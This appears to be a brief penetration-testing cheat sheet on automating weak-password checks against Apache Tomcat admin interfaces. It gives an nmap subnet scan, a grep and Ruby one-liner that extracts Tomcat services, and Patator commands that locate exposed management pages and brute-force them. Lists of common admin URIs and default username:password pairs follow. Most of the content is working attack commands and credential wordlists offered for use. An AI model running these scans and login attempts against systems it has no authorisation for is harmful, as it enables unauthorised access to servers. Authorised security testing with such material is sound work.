Last Updated: February 25, 2016
·
5.308K
· werrett

Automating checks for Tomcat weak passwords

Checking Tomcat installs for weak passwords is super laborious but often eventually rewarding part of any internal pentest. Here is a quick and nasty cheat sheet that uses Sebastien Macke's awesome Patator to automate the process.

First obtain a list Tomcat services from an nmap scan. Make sure the scan saved output in 'grepable' format (eg. -oG flag). For example:

nmap -sS -sV -sC -Pn -p80-89,443,8000-8999  192.168.0.0/24 -oG web-scan

Pull out any Tomcat instances from the nmap scan result (I am so sorry Regex/Ruby gods).

grep -i tomcat web-scan.gnmap | ruby -ne 'h = $_.match(/.*Host: ([\d\.]+)/)[1]; $_.scan(/(\d+)\/open\/tcp\/\/(ssl|http)[^,]+tomcat[^,]+\/,/i).each {|x| x[1].gsub!(/ssl/,"https"); puts "#{x[1]}:#{h}:#{x[0]}"};' > tomcat-services.txt

You will now have a list of Tomcat services in scheme:address:port format.

Use patator to quickly identify any Tomcat services that have Admin interfaces exposed (see end of page for Tomcat Admin URIs).

patator.py http_fuzz url=COMBO00://COMBO01:COMBO02/FILE1 0=tomcat-services.txt 1=tomcat-admin-uris.txt -x ignore:code=404 -x ignore:fgrep='administration web application is no longer installed by default' -l services

Admin interfaces are usually those returning 401 Unauthorized error messages. You should also manually check out the 200 OK responses as well.

Use grep to get a list of the management interfaces:

grep '401 Unauthorized' services/RESULTS.csv | cut -d',' -f6 > tomcat-admin-interfaces.txt

You will now have a list of Tomcat services in scheme:address:port:uri format.

Use patator to quickly check for weak passwords (see end of document for a list of default Tomcat passwords):

./patator.py http_fuzz url=COMBO00://COMBO01:COMBO02/COMBO03 user_pass=COMBO10:COMBO11 0=tomcat-admin-interfaces.txt 1=tomcat-account-combos.txt -x ignore:code=403 -x ignore:code=401 -l accounts

Payday will be in the 200 OK responses!


Supporting Files

Common Admin Interfaces

A list of URIs for common Tomcat Admin interfaces (eg. tomcat-admin-uris.txt as used above).

status/
admin/
web-console/
jmx-console/
admin-console/
manager/html
web-console/Invoker
jmx-console/HtmlAdaptor
invoker/JMXInvokerServlet

Common Default Passwords

List of common default passwords for Tomcat Admin interfaces (eg. tomcat-account-combos.txt as above). Credits to Chris Sullo.

admin:
admin:Password1
admin:admin
admin:j5Brn9
admin:password
admin:password1
admin:tomcat
both:tomcat
role1:role1
role1:tomcat
role:changethis
root:Password1
root:changethis
root:password
root:password1
root:r00t
root:root
root:toor
tomcat:
tomcat:Password1
tomcat:admin
tomcat:changethis
tomcat:password
tomcat:password1
tomcat:tomcat